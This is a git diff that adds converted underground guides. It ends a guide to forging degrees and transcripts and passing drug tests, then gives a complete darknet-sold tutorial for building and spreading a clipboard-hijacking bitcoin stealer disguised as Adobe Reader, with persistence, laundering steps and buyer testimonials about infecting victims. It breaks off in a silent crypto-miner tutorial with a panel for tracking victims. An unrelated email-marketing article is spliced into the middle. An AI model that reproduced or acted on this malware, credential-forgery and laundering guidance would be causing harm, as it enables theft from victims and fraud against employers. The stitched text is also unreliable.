attended (larger libraries +usually have past school catalogs). Make as good a copy of the +real transcript as you can, use cover up strips to block out your +name and other personal information. +Then use a computer or typewriter to replace the previous +personal information with your own. You can plan to spend an +entire evening working out the details of your new/old degree and +creating a believable copy of your transcripts. And be sure to +include that all-important raised seal. +You may also want to know that several of the larger Universities +are international in scope. They maintain locations both here in +the US and overseas. One of the largest of these is one that’s +located in the state of Maryland. +If you claim a degree from one of these international schools and +your future employer should experience problems when they +attempt to verify your degree, you could claim that the university +has so many different operations that the verification process is +rather unreliable. I’ve known several people who have +successfully used this approach. It’s a common and therefore +believable story. +Never forget that those friendly folks who run mail drops will gladly +open a box for you through the mail. See the list of mail drops at +the end of this report. You can then use this new box as the +college’s official mailing address. Which means that the degree +verification form will be sent directly to you so that you can then +provide the verification yourself. +How to Handle Being Fired +Most people haven’t got a clue what to do when faced with a job +termination. It’s usually very difficult to think clearly when you’re +emotionally upset. Contrary to most people’s opinion, most firings +are political in nature and seldom involve honesty or performance +issues (but you can expect these issues to be raised as +justification for your termination). Please read the following and try +and commit it to memory. It might come in very handy at some +point in the future. +When being fired the most important thing to remember is – don’t +panic! The situation is not as bad as you might think. There are a +host of forces at play which will come to your aid. No matter how +bad the situation is, always remember that you’re not in an entirely +powerless position. You have some rather powerful cards to play. +Stay calm. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 296 - +Reproduction in any form is prohibited without written permission. + +No matter how wildly your guts are grinding, don’t lose your cool. +Managers are after all, human beings. And no matter how they +personally feel about you, all managers hate to do terminations. +They fear you’ll go ballistic and cause a scene. Or even get violent +and attempt to harm them. So to smooth your exit most employers +will openly offer to provide you with a standard positive +employment reference provided you leave quickly and quietly. +They won’t offer you this fig leaf out of the kindness of their hearts. +They’ll do it because they’re scared to death that you’ll launch one +of those much-dreaded high profile, bazillion-dollar “wrongful +termination” lawsuits. +Being an executive today is a bit like tap dancing through a +minefield. Every day the courts award fired employees generous +settlements for the most groundless of claims. Also, rather than +fight it out in the courts over a matter of principle, most employers +will quickly attempt to settle out-of-court due to the fabulous cost +of court proceedings. +Several months back when a firm called a manager asking for an +employment reference on a former employee who was a good +worker, he gladly sang his praises. The entire phone call took all +of sixty seconds. He then put the call entirely out of his mind. +Two months later the legal department called. They wanted to +know exactly what he had said during the phone call as the former +employee was suing for discrimination claiming generous +damages in the mid six figures. The firm settled out of court rather +than fight the baseless charges. The manager now has all his +calls screened and steadfastly refuses to discuss former +employees over the phone. +In the unlikely event that they don’t volunteer to say nice things +about you, firmly insist that they do while you’re still on the payroll +and on company premises. +Once you go home, you lose some of your bargaining power. You +might say something like “OK, I’ll go quietly but only if in return +you’ll give me a normal positive employment reference including a +positive rehire status”. +Most employers will agree to almost anything just to get you off +their property without a scene. This is an important detail that can +hurt you later if you forget to mention it. This is your price for +leaving quietly. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 297 - +Reproduction in any form is prohibited without written permission. + +If in the end they decline to entertain your demand, calmly say that +you’re very disappointed with their decision. It would give you +much pain to have to get your attorney involved in this matter but +– hey – you’ve got to protect your legal rights and since they’re not +being reasonable – you’ll be forced to take up the matter with your +lawyer. +If you’ve been injured at any time during your employment, this +may be an excellent time to mention it as casually as possible. Did +you slip and fall on a hard floor? Or perhaps you had a problem +with a power tool. Whatever the nature of the accident, the mere +mention of it can instantly change a firing manager’s whole +attitude. +Besides fearing expensive law suits, employers are also paralyzed +with the fear that an employee will file a “workers’ compensation +claim” which will result in the premium for the entire company +being permanently increased. Employees with potentially +expensive injuries are usually given “kid glove” treatment and this +fact may be of use to you. +If you still can’t get that all-important positive reference, it’s time +for some drastic action. In most cities you’ll find numerous legal +clinics listed in the yellow pages. Call a few and ask how much +they charge to send a simple lawyer’s letter to a former employer. +These clinics usually charge very modest fees. +The lawyer will know exactly what to say in his letter, which will +most probably contain a veiled threat of legal action if you even +suspect that a negative reference has been given. +A lawyer’s letter may do the trick even though the employer +doesn’t acknowledge changing their position. You can bet that +your letter will be placed in your personnel file where it will be +viewed by anyone who is called upon to provide a employment +reference in the future. +In the unlikely event that the firing firm still hasn’t given in, you’ll +be forced to consider using one of several forms of resume +modification. If you’ve been employed by the firing firm for less +than six months, the solution may be as simple as eliminating the +firing company from the top of the work history section of your +resume and then extending the employment dates for the previous +employer. It’ll be just as if you never even worked for the firing +company! This is an extremely common practice these days. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 298 - +Reproduction in any form is prohibited without written permission. + +A Short Note About Passing a Drug Test +When confronted with a drug test, try and delay the test as much +as possible. It’s common practice to hand out Monday morning +test appointments. They’re betting that, if you’re a drug user, you +can’t get through a weekend without using your favorite drug. If +you are a drug user, it’s obvious that you’ll have to abstain from +drug use for as long as possible. +Then spend the two days before the test eating as little as +possible. At the same time consuming as much watermelon and +water as you can stand. +The goal is to spend at least one full day urinating copiously. This +will clean out your system and while it’s not fool proof it will +increase your chances of passing. Be aware however, that +marijuana remains in the system far longer than most other +common abuse drugs and will require a longer abstinence period +if you expect to pass the test. +Don’t get carried away though. Several people have died in +emergency rooms recently because they took in too much fluid! +It’s a strange fact that when applicants for well-paying ($35,000) +positions as truck drivers are given appointments for drug tests, +on average, only three out of ten applicants actually show up to be +tested. Sometimes the mere threat is more effective at screening +out drug abusers than the actual test itself. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 299 - +Reproduction in any form is prohibited without written permission. diff --git a/Howto steal bitcoin 4.0_pdf.md b/Howto steal bitcoin 4.0_pdf.md new file mode 100644 index 0000000..f0c109a --- /dev/null +++ b/Howto steal bitcoin 4.0_pdf.md @@ -0,0 +1,670 @@ +# Howto steal bitcoin 4.0 + + +--- + +HOWTO STEAL +BITCOIN 4.0 + +Table of Contents +1Foreword...........................................................................................................3 +2Justification........................................................................................................4 +3Introduction.......................................................................................................5 +This guide is NOT for you if..............................................................................5 +This guide is for you if.....................................................................................5 +4The development process of the guide.............................................................6 +5Awesome tutorial video.....................................................................................6 +6Keep in mind before you start...........................................................................7 +7Get a safe bitcoin wallet and learn how to launder your coins..........................8 +Store your coins...............................................................................................8 +Steps:...........................................................................................................8 +Laundering......................................................................................................8 +The most common way to launder coins is Blockchain.info Shared Coins...8 +The most secure way to launder your coins is through anonimous altcoins9 +8Generate a bunch of addresses......................................................................10 +Notes:........................................................................................................11 +Testing the Mass Address Generator.............................................................11 +7.Create your own BITCOIN STEALER malware.................................................13 +9Testing your malware......................................................................................21 +10Remove the malware....................................................................................22 +11Summing up: how the malware works..........................................................23 +12Experiences / FAQs / ideas............................................................................24 + +1 Foreword +My motivation is purely technical. I am using this method over a year with +huge success. About half a year ago I wrote the first version of this guide and +started to sell it in Evolution. The reason was because I got stucked and lazy +and was not developing the method further, but when I put it on the market, I +suddenly recieved a bunch of feedback. My guide quickly became one of the +most popular item on Evo, as a result I gained back my motivation and +amazing things were happening with not just this software but with my wallet, +too. But after that Evolution exit scam happened and I decided to buy some +flight ticket and go on a crazy holiday until a nice new market emerges. The +time has come and I am back. +So do not get fooled and think, because of the cheap price, this +guide does not worth shit, in fact, I am not aware of any guide +in the market that would be more valuable than this one. As I +said, my motivation is to develop further this method and I don't +give a fuck about thaose few bitcoins I can get out of this +market. + +2 Justification +When a system get attacked it becomes more resilient. +I honestly hope this method will not work in 2-3 years from now, but if we +don't attack it now, then someone will do it, after my grandpa and your +grandma start to use bitcoin and that would be a huge disaster. +You have to attack bitcoin in order to make it better. + +3 Introduction +It is an easy-to-follow, comprehensive, step-by-step guide. If you follow this +you will never have to worry about finances again. +This is an advanced, tested, professional hacking method. This is the first (and +right now the only) guide that makes it possible the first time for an average +person to use this classic and effective method. +This software is unique, developed by me. The reason why this method is not +being used by the average Joe is because you actually have to hardcode your +btc address into the program and then build the project by yourself. +The good news are, if you have the source code and clear instructions, it is not +difficult at all. +The package contains the source code (C#) of a malware (BITCOIN STEALER) +that watches Windows clipboard for Bitcoin addresses and replaces +them with your own. So the target will send the coins to you by +mistake. +Also there is a trick that makes your bitcoin address looks similar to +the copied address... +For example, if the target's address is like this: +1JRCnFwbr4wwtzGJ1gkqpVgwCZg9MSwdJE +Yours will be like this: +1JRCfyjr1yvZzH9JuoEYZyYY5tWconhyhpgIE +An other advantage of having the source code is that it keeps you safe (from +me), because you can revise it by yourself, also you can trust it has been +revised by others many times before. +This guide also will show you how to use this software effectively. The package +will show you the social engineering and phishing methods in order to reach +your goal. +Your only goal is to make the targets to run your exe and from there you can +lay back in the rest of your life, go to Malibu and watch the money flowing in. +This guide is NOT for you if +• you want to invest your money into illegal activity +• you want to take risk +This guide is for you if +• you are average person, who wants to make easy money +• you are an average techie, who wants to know how to use an advanced + +hacking technique +• you are a programmer, who needs the source code of a masterpiece +4 The development process of the +guide +It is important to know, the developement of this software is continious. As it +becomes more and more powerful tool, the price will raise simultaneously. +Well, I have good news for you. If you buy this product and then contribute to +its forum topic you'll get the next version for free, you don't even have to buy +the price difference. All you have to do is to send me a pm with a link to your +forum post when you notice a new version is out. +5 Awesome tutorial video +Wakawakala9 made a nice tutorial video. It won't be compatible with newer +versions, but it will definitely help you get some idea. +https://www.youtube.com/watch?v=kTVJna6VhuA + +6 Keep in mind before you start +I know there are so many bullshit and poorly written article on the internet +and people tend to rush through them. This is not one of them. You have to +read and follow it carefully and you will make money. Do not rush, it won't be a +waste of time! + +7 Get a safe bitcoin wallet and learn +how to launder your coins +Assuming you have bought this guide on the black market, there is a big +chance you already have a reliable wallet, that nobody knows is yours, but let +me say the truth, most of you guys are so careless. +The coin laundering extremely critical here here, because you are about to +steal other people's money and I bet they will try to follow you on the +blockchain. +Store your coins +I recommend using blockchain.info wallet over TOR, because it has onion +address. (http://blog.blockchain.com/2014/12/03/improved-security-for-tor- +users/) +You can also store your coins on a desktop wallet, too, it is your decision, but +right now I cannot recommend any other web wallet that would have an onion +address. This is critical, because it will keep your money safe from malicious +TOR exit nodes. +Steps: +1. Use TOR browser +2. Go to the onion address of the blockchain.info wallet: +https://blockchainbdgpzk.onion/ +3. Create a wallet for the coins you steal. +Laundering +However the common belief is that bitcoin mixing techniques are just fine and +they works and maybe they are right about that, my belief is different. +The most common way to launder coins is +Blockchain.info Shared Coins +example: +btc address -> blockhain.info shared send -> an other btc address +*note: DarkWallet will be nice and might be the ultimate solution, but it's too +baby to use it yet. If not neccessary, don't use anything that's not stable. + +The most secure way to launder your coins is +through anonimous altcoins +There are some stealthy anonymous coins like Darkcoin (DRK) and Monero +(XMR). They are working. I cannot tell too much about other anoncoins, since I +did not looked into them. +NOTE: DRK has been renamed to DASH, because its developers are a +bunch of pussy. Fuck them I'm not going to use that name. +So there is this amazing service, called Shapeshift from Erik Voorhees. +No account needed, only an altcoin address and an amount and you can send +there bitcoin. +example: +btc address -> blockhain.info shared send -> shapeshift.io -> drk +address -> DarkSend-> shapeshift.io -> btc address + +8 Generate a bunch of addresses +«Are you insane? Why would I do that?» you ask... Listen, here is the trick. You +want your bitcoin address to look similar to the target's copied adress. Then +let's create a bunch of addresses first and let our malware to choose the most +similar one. +You'll need my Mass Address Generator, that I've written for this. You can find +it in the package, accompanied by it's source code. +/* +Programmer's note: If you want to build the source yourself, +you can do it in exactly the same way that you'll do it with +the Bitcoin Stealer application in the following sections of +this guide. +The only differences are, the project has to be in at least +.NET4.5 and you'll need two NuGet package: NBitcoin and the +Blockchain.info's API +*/ +To run this app, you'll need to install the .NET 4.5 framework. +https://www.microsoft.com/en-us/download/details.aspx?id=30653 +Set how many addresses you want to generate and press start, you're +cool. You've just generated a bunch of bitcoin addresses and their secret +key pairs. I'd recommend you at first start with 100 addresses for testing +purposes. + +After you've generated your addresses, at the « Wallet » tab, with the +« Refresh » button you can check if there are some not empty among them. +(There won't be, until sb send money to it.) +• If you've generated 100 000 addresses, refreshing will take for a day. +• If you've generated 10 000 addresses, refreshing will take for about +40min. +• Refreshing 100 addresses takes less than a minute. +Generated files : +addressSecretPairs.txt – stores all the generated addresses and +their corresponding secret keys. +vanityAddresses.txt – stores all the generated addresses only. +This is what our malware will need. +notEmptyAddresses – stores not empty addresses and their +corresponding secret keys. When you click « Refresh » it will +generate this file. +Notes: +• When you generate new files, they'll overwrite the old ones. +• You probably wants to store them safely and make a backup. +Testing the Mass Address Generator +1. Open the program, click start. This will generate 100 addresses and their + +corresponding secrets. +2. Check out generated addresses. Send a small amount, like (0.0001btc) to +one of them. +3. When the coins has arrived, change to the « Wallet » tab and click +« Refresh ». +4. Check out not empty addresses ! (Format: address:secretKey) +5. Go to your Bitcoin wallet and import the secret key. (Preferably +Blockchain.info (https://blockchainbdgpzk.onion/) +It's extremely easy, 3 click : +You click « I Understand », because you're an advance user. (If they'd +have any idea how advanced you are:) +6. Congratulations ! You're done, you can spend the money. + +7. Create your own BITCOIN STEALER +malware +This is the core of the guide. It's time to do the geeky stuff. We're gonna +change a few lines in the code and build our C# project. After this you can write +it into your CV. Wait... what? +First of all, you have to know C# is a Microsoft slave language. This means, +from now on we're working on Windows. More accurately, we're going to code +in .NET Framework 4.0, that means you have to use Windows XP SP3 or higher +version (like Windows 7,8). +If you don't have Windows I recommend you to use VirtualBox +(https://www.virtualbox.org/). You install it, then you set up a Windows virtual +machine in it. +Note: it is important to use the latest version of VirtualBox +Next we need to get the Visual Studio. +I recommend you to use the Visual Studio Community version. +http://www.visualstudio.com/ +Note: the Visual Studio is the longest taking installing software +in the whole world: (Ok, it's not, but you get the point.) +Now, that we have set up the requirements it's finally time to code. +From here you should follow these instructions very strictly, because if you are +not familiar with coding, you can't make any mistake here. If you have done a +mistake, delete everything and start this chapter from here again. +1. Run Visual Studio +2. File/New/Project/ +Select Templates/Visual C#/Windows Forms Application +Select .NET Framework 4 +Name: Adobe Reader - you want to choose a name that is not suspicios +for the a user when it is looking at the processes. I mean "BITCOIN STEALER" +would be a very bad idea. However in this tutorial I will not show you how to go + +with an other name (eg. « chrome » or sth), if you don't want any conflict, just +let it be "Adobe Reader". As you can see on the pictures, I was using +« explorer », but it turns out to be not a good idea, because with this name it +won't work on winxp. +Programmers note: If you want to go with an other name find and +change the «adobe» string everywhere in the solution. (ctrl+F, +search in whole solution) +Solution name: Adobe Reader +Location: here you want to select some folder that you'll never let +anybody to see. +3. In the Solution Explorer rename the "Form1.cs" to "BackgroundForm.cs". + +4. Open the project folder (Adobe Reader). + +5. Open the Bitcoin Stealer/sources (it's next to this pdf what you're reading +right now). +6. Copy and replace everything from Bitcoin Stealer/sources folder to the +project folder (Adobe Reader). +7. Right click on Adobe Reader / Add existing Item... + +8. Select Program.cs and Tools.cs from the project folder (Adobe Reader). +9. Right click on project (Adobe Reader) / select Properties. +Note: On some picture the name of the project is «AdobeUpdate» +instead of «explorer». Do not get confused by that. + +10. Select Resources / click Add Resource from Existing file. +11. Choose your vanityAddresses.txt you've just generated with the +MassAddressGenerator. +12. Set Access Modifier to «Public» + +13. There is one more last setting we want to set. We want to build our project +in Release mode. +Programmer's note: you can use choose Debug mode if you want +to mess around with the code. +If you use debug, then you don't need to remove the malware +from your computer, since it doesn't copy itself into it and +will not start with the Windows. +14. Now it's time to build our solution. If we have done everything right we +won't get any error here. +Congratulations, you've created your first malware, now you're officially a +hacker. You can tell everybody about it. Wait... what? + +9 Testing your malware +Now it's time to do the testing. +First locate the exe file: Adobe Reader/bin/Release/Adobe Reader.exe (you can +rename it as you wish). From here you won't need any other file to work with, +only the executable. +1. Copy the exe to your Desktop +2. Run the executable! (Attention: you're not going to see any welcome +windows or anything, like that. Just imagine, how would you react if a +window would pop up every time you start your computer with a +message like this: "Hey man, what's up?! I'm a virus, I've infected your +computer... sucker.") +3. Check if our program is running: Windows Task Manager/Processes. +(Press ctrl+shift+esc) Here you should see "Chrome32.exe" program is +running. +4. Now copy a bitcoin address and paste it somewhere. Does it work? No? +Do it again WITH AN OTHER ADDRESS! Still don't work? Do it again with +an other address! Repeat! +The reason why it doesn't work all the time, because it would be too +suspicios. Furthermore if you copy the same address twice, it won't work, +too in order to avoid suspicion. +There is a variable at the beginning of BackgroundForm.cs, called +OppToMissDef. If you change it's value to 0, it will work every +time (exept when you try to paste the same address twice) +5. Finally restart your computer and check if it starts running with the +Windows. But now the name of the program will be "AcroRd32.exe" and +not "Chrome32.exe". Why is that? +When you run your exe it will copy itself somewhere on your +computer and change it's name to Chrome32.exe and copy itself to +somewhere else with a name as AcroRd32.exe. Then execute this +Chrome32.exe, then delete itself. +So now Chrome32.exe is running, but if the user is so smart, it +will realize, "OMG, I've just launched a malware", so it goes to +processes, find this Chrome32.exe, delete it and stop it. +Well not quite yet. When the user next starts the windows, the +AcroRd32 will run, even if it deleted the Chrome32. +If you didn't understand what I was just saying, don't worry, +it's my fault. It's enough to know, when the target launches the +exe, it will delete itself. + +10 Remove the malware +Finally remove it from your computer: +1. Start Windows Task Manager and terminate the Chrome32.exe or +AcroRd32.exe process! +2. Go to %appdata% in your file browser. +3. Delete AppData/Roaming/Adobe (x86) folder. +4. Delete AppData/Local/Google (x86) folder. +If you don't terminate the malware manually, as it is described +in the first point you can't delete one of the folder. +If you've deleted the Adobe folder it won't start again on your +computer, so you're good, but to completly remove it you have to +do one more thing: +• Start the Registry Editor (regedit) and delete our software from +"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru +n" +If you don't find it, check HKEY_LOCAL_MACHINE instead of +HKEY_CURRENT_USER + +11 Summing up: how the malware +works +You only have a standalone exe file. You can rename it to anything. Let's say +InnocentSoftware.exe. +Someone click on InnocentSoftware.exe, then it will disappear. What happens +is, InnocentSoftare.exe copies our malware to AppData/Roaming/Adobe +(x86)/AcroRd32.exe and AppData/Local/Google (x86)/Chrome32.exe and make +sure AcroRd32.exe starts with Windows every time. +Then it starts Chrome32.exe. +Then InnocentSoftware.exe stop running. +Then Chrome32.exe deletes InnocentSoftware.exe. +When the user copies a btc address then it pastes yours instead of the user's. +Furthermore, it will look similar to the the copied address. +However there are some mechanisms in place in order to avoid suspicion, for +example when the user copies the same address twice in a row the copypaste +will work normally and it will only work for every 3rd opportunities. (Or +whatever what you set the OppToMissDef in the BackgoundForm.cs file) +For better understanding you might also want to take a look at +the BackgroundForm.cs file's comments (and maybe the code). + +12 Experiences / FAQs / ideas +blowmoney1996 +This guide is great. Stole about 2.3 btc already. This is the +fuckin shit. He delivered it within 5 min and is a great vendor. +real_barreface +Got the guide within an hour of ordering and scammed 5 BTC in 2 +days. Learn to spread this and your good +Scheynkine +fun fact #1 +got robbed today from my own malware. +... +not robbed exactly, i just wanted to transfer from wallet to evo. +instead it ended up in the scam-wallet.. i thought i deleted it, +but i didnt clear the appdata. but it's great, that it really +works! +What about Anti virus softwares, do they detect it? +It is a pretty "harmless" software, you won't have any problem +with it. It does not communicate with the internet, or does +anything fairly suspicious. +gavioesdafiel +Hi All, +I just have started my learning process to spread/spam this +malware. As i dont have too many skills on that Im getting some +basics tips that I wanted to share with you. I appreciate any +kind of information/tips that you can share with me. |o| +" +11 Hacks to Increase Your Email Open Rates +The grim reality of email marketing is that very few people +actually pay attention to the messages they receive. Email is +the primary mode of communication for so many businesses that an +opt-in just doesn’t have the value it once did. 100 people might +claim they want your newsletter, but when it comes time for the +mental investment of opening it and reading what’s inside, maybe +5-10 of them actually do. +1. Make sure your newsletter looks good. +The idea behind this hack is that, when a user signs up for your +mailing list, they’re going to open the first message you send. + +If they open that message and they discover a newsletter that +looks broken or skewed, they’ll figure your message is broken in +some way. Maybe they’ll let you know, maybe they’ll just delete +the message. Either way, that bad experience lingers, and the +next time a newsletter comes by it languishes in their inbox. +You can test your newsletters using Litmus, to see how it will +look on various platforms, including mobile. Litmus will also +tell you if something in your message or subject line will trip +spam filters. +2. Keep your subject lines short. +According to a survey presented by Salesforce, your email open +rates will almost definitely be much higher when your subject +line is short. A subject line under 10 characters is enticing +enough to give you a nearly 60% open rate on average. Chances +are this is well above what you typically experience. +What can you do in ten characters? You only have two or three +short words to play with. Fortunately, short language is +enticing on its own. In a world of subject lines that run long +enough to be truncated, a short subject line stands out. It +almost doesn’t matter what you write. +3. Use title case capitalization in your subject line. +Use-title-case-capitalization-in-your-subject-line +It’s much more attention-grabbing to use title case – that is, +Capitalization of the First Letter of Each Major Word – in your +subject line than it is to use a standard sentence. Treat your +email subject line in the same way you might treat the title of a +blog post for your rich snippet. While a subject line should be +short, it doesn’t have to be, and a compelling question can break +the length rule and maintain a high open rate. +4. Send and send and send again. +Whenever you send out a message, track who opens it and who +doesn’t. Anyone who doesn’t open it should be added to a new +list of people you can target again. If they don’t open your +message, it’s as though they never saw it in the first place. It +might be buried in their inbox, they might have deleted it +without thinking or it might have ended up in an archive. In any +case, you can safely send the email a second time, potentially +drawing quite a bit of additional attention. You may not want to +send a third time, however; the rule of threes lends extra +potency to a third dismissal. +You might like: +How to Turn Your Mailchimp Subscribers Into CustomersHow to Turn +Your Mailchimp Subscribers Into Customers Your mailing list, as +powered by Mailchimp, is one of… +5. Proof your message, and have someone else do it. +When you spend a lengthy amount of time working on a single +project, you grow a sort of mental blindness to its flaws. Your +mind fills with the concepts and thoughts behind each word you +write, rather than what you write itself. In the end, you might + +end up with a message you think is perfect, with a prominent typo +you keep missing. Enlist the aid of someone, it doesn’t matter +who; just someone who will put a second pair of eyes on the piece +and proofread it for you. +6. Satisfy the subject line. +The point of a subject line, at least a good one, is to stir +thoughts in the reader. Your goal is to make them ask what could +possibly come as a follow-up from that subject line, with the +promise that the answer is inside the email. +That means you need to live up to your promise and follow up on +your subject line in the message itself. You can’t draw in +attention with one concept, only to disregard it in the body; +it’s a bait and switch that leaves users disappointed. +7. Invite replies. +Invite-replies +Here’s one thing you don’t see every day; “If you have any +questions, feel free to respond to this message.” Most emails +from large companies are sent from automated accounts that no one +checks. Users are used to needing to find your contact +information on your site if they have a question, and that’s too +much work. It means a lot of questions go unanswered. Instead, +open up your newletter as a two-way communication. Even if you +then forward the replies you get to your customer service email +address, you’re still giving users a direct route back to you. +8. Use bright, colorful buttons for your CTA. +Your call to action should be preceded by a question, and it +should take the form of a bright colored button. Users tend to +gloss over plain text links in their emails, just as they do on +your landing page. And, just like your landing page, you need to +optimize your CTA in the newsletter. After all, it’s the +newsletter that helps funnel traffic to your landing page. +9. Segment your newsletter mailing list and test variations. +Split testing isn’t just for ads or landing pages; you can split +test your newsletters as well. Segment your audience into groups +and send variations on your message to each. Try to keep +representative groups if you’re testing general changes, like +tweaks to your subject line or the color of your CTA button. You +might skew your results if you segment by demographics to run +your tests. +10. Don’t forget the other messages you send. +When a user decides to download your white paper or ebook, do you +send them a confirmation email and thank-you letter? If so, you +might be missing out on a great opportunity. Consider that +content delivery message as a chance to include more hooks for +future actions, both in the immediate short term and the long +term. There’s always something you can encourage the user to do +to support your brand. +11. Maintain a consistent voice. +Users feel like they’re interacting with an impersonal, robotic + +corporate face if they receive drastically different messages +from different marketing channels. If their experience with +customer service is much more casual, how are they to trust that +it’s not some outsourced company doing the work? A consistent +voice allows them to trust your business that much more. +He man, i messed around with your V1 of the bitcoin stealer and +got deeper in the spreading method. +I found some method to spread it that works for me so i want to +share it to you. +I hide the .exe in a .rar with images and changed the .exe to +.jpg and changed the icon from .exe to the one of .jpg , so you +don't see the .exe file until you click the image but then its +already to late wink +I have a little not proud method to spread this .rar file with +images , i do it on teen chat sites and login as female and ask +if they want to see pictures. +So far your method give me like $200,- , i want to thank you for +that ! +I've gave some thought to this. Maybe you can scam some pedos +with it. Upload the pics and write a post to a pedo forum. Pedos +probably use bitcoin, cos they're on tor. +1.0 review +TheSaint +So, I finally found time for this. +Nothing much to say. The guide might be confusing to a complete +newb, I wouldn't call it total noob friendly, however it is easy +to follow and the whole thing can be done in about 3 minutes, +from the moment You get all the tools on point. +This stealer MIGHT steal something, but it needs spreading. And +spreading is pain. If You are willing to bare the pain, I rather +recommend setting up a rat or a botnet as it's way more +profitable and fun. But then You need to crypt it (preferably +FUD) and that would cost something. +To sum things up - This is bitcoin stealing for noobs. +The Guide - 4/5 (could be more noob friendly) +The program - 3/5 (I saw that You are twisting it, so it might +get better) +PS. I check the addresses like 5 times, so I would never fall for +this. +Think about that. +Cheers. +2.0 review + +TheSaint +I finally decided to look at the updated version. You've done a +wonderful job here. With the 100000 addresses it will be even +better. The guide is alright, it looks a bit messy though, but +that's not a problem. The stealer is amazing, works flawlessly. +Now, I don't know if this is possible, but I'd love to see this +stealer infecting usb sticks. That would spread it like a plague. +What this really needs is a FUD Crypter, binder and extension +spoofer. +The very best thing about this tool, is that it can't be traced +back to You, rather than a botnet for instance. +I thank You for your work. +Waiting for more updates. +Cheers! +Virtualbox vs Visual Studio +swimmar +Currently attempting to see it work in real-time, but I am using +a virtual machine and it seems to not like that.. will keep +trying and use a real machine as well. +funWithCodes +There are some memory corruption problems I know about with +virtualbox and visual studio together, the solution is to update +the virtualbox for the newest version. I'm not sure there should +be a problem with specifically with these softwares. +swimmar +Got it working. Updated virtualbox (as recommended... foolish +mistake), but also set the auto-start in the configuration +settings in Visual Studio. +besmart +if anyone can get a cracked version of this +http://www.exejoiner.com/ would be great. Seems to be the perfect +tool to make this stealer ready for spreading. +Kefkalink777 +So, after about 1 week of using torrent services to spread files +infected with this program, I have finally seen some success. +Only got a little over $25 in bitcoin, which may not seem like +much, but is much more than I have invested in this, and also +PROVES that this malware works. For those who are interested, I +used a free crypter/binder program called aegis crypter to bind +the malware to other files, mostly cracked video game files, and +also a few bitcoin mining programs. I then used Utorrent to turn +those into torrent files, and uploaded the torrents to every +sharing website I could find. The downside is, I am now banned + +from pretty much every single major torrent sharing site out +there. If anyone has any experience with crypters, I am looking +for an up-to-date FUD stub for the Aegis Crypter program. +tl;dr This program works, confirmed. It's just really hard to +effectively spread. +Once i find a spammer to send out the malware. What will i give +the spammer to send. Im guessing i piece together the malware via +the coding instructions given, then submit the finished product +to the spammer to send out? +Exactly, as you've said. Only the exe what the spammer need. +Do you have Jabber or ICQ? +Sorry, I consider to be too risky the use of instant messaging +apps. +I saw on the forum that you give the update free to the buyers +who bought it before? +Yes, I do. +btw, do not recommend bitfogger. they are a mess. read this: +https://bitcointalk.org/index.php?topic=50037.340 +Does it work on Mac? +No. + +Advices on how to get your malware running on other computers +Now that we have everything what we need, it is time for action. +The only goal of this chapter is to make people to run your exe. +It is the interesting part, because you have to be creative from +here, think about what you have, what you can use. In this +chapter I'm going to give you ideas that you might haven't +thought of. +You can target specific people. +A good tactic could be is to get a pendrive and put on the virus +to every computer you meet. You'd be surprised how many there +are. If somebody don't use Bitcoin don't hesitate he will +eventually! That's even better, you know... mistakes of the +beginners. +Go to libraries, schools, net cafes, basically any place that has +computers in it in your city. +What about your company? +Ask for help on deepweb forums. Team up with other people. Buy a +hacking service or something... +Read the guides I've included to the pack and get some ideas from +there. +Gotta tell you something funny that happen to me, I stole from +myself, well, not exactly lol..This is how it happened, I +executed the malware on my laptop just for a test, but forgot to +totally delete it. So i'm doing this deal out of evo with +somebody who wanted a ID scan, so he was like give me your wallet +addy, I copied, and pasted it into ICQ messenger, and I didn't +even think twice to check the address, just sorta just sent it. I +wouldn't have noticed I gave him 1 of my vanity addresses until +he said "You know you have fbi in your address?" ya know just for +a little laugh, so I laughed an was like really? jokingly, so +something told me to glance at the addy I copied, and seen it +wasn't my copied address, but it was too late, he had already +sent payment to it lol.. +Moral is, if I can just send that addy without even checking it, +this malware is golden if spreaded right, bcuz if I was a victim, +it would already be too late, an my coins would be gone. +Now it's just the spreading I'm having issues with without it +being detected. The binding is alright if your mark isn't too +smart about downloads, and file types. My method was binding the +malware with a actual real PDF carding guide,with a adobe icon. +when you execute the file, the guide comes up, and the exe +executes in the background, which is perfect BUT what gives it +away is the file type being "Application" whenever they unpack +the rar file, and then they are like, hey nice try asshole lol..I + +been doing some studying on how to crypt it, but haven't been +lucky, bcuz I'm not good at coding in that department. what I've +read so far, that's what's gotta be done for this to be +effective. Hope you can come up with a solution. On the forum, +that seems to be mostly everybodies only problem. +noname +Hey there, +i wanted to check my adresses, if somebody transfered something +to my faked adresses. but i accidentally pressed the wrong button +and it generated new adresses. is there any way i can check the +old ones? +Regards +funWithCodes +I'm sorry, you've just lost your secret keys. diff --git a/INSTRUCTIONS_pdf.md b/INSTRUCTIONS_pdf.md new file mode 100644 index 0000000..6b96ccd --- /dev/null +++ b/INSTRUCTIONS_pdf.md @@ -0,0 +1,70 @@ +# INSTRUCTIONS + + +--- + +START MAKING MONEY +WITH SILENT MINERS +*NOTE* +DO NOT ASSUME RESPONSIBILITY FOR THE ILLEGAL +ACTIONS OF THE USERS AND I HAVE NO LEGAL OBLIGATION +TOWARDS THEM OR TOWARDS THE INDIVIDUALS DAMAGED +BY THEM. +THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE +ONLY ;) + +1. The archive contains: +- Step-By-Step Tutorial +- Silent Miner Builder XMR +- 3 Mining Profiles +- WebPanel for Tracking +- C# Native Obsfucator to Reduce Detections +2. Set-up. +Let’s setup the web panel first so you can track and manage all the infected people +that will run your miner. Go to 000webhost.com , sign-up, create your free +website, go to My Websites, click Manage Website, File Manager, copy the +content from WebPanel FOLDER that i provided and paste it in your website file +manager. After all the file are loaded, click config.php , search for +$config['password'] = 'pass' and change ‘pass’ with your own password. This will +be used to login to the panel later. If there are errors, try to paste each file +individually. +After you’ve done this, visit your website and it should look like this: + +Type your password and click login and the website should look like this: +If you wish to add the web panel to the SilentCryptoMiner then enter the following +website yourwebsite.com/api/endpoint.php (replace yourwebsite.com with your URL) +and copy the link. +In the archive you will find Silent Crypto Miner Builder.exe prebuild version (v2.5.0 +UPDATED). You have to run the software (sometimes it might get detected by the +antivirus, that’s normal, this software uses .NET Miner and Injector which is detected as a +malware; in case it doesn’t start, turn off antivirus and try again) and you will see +something like this. +After you successfully ran the Silent Crypto Miner Builder.exe , you have to press the +LOAD 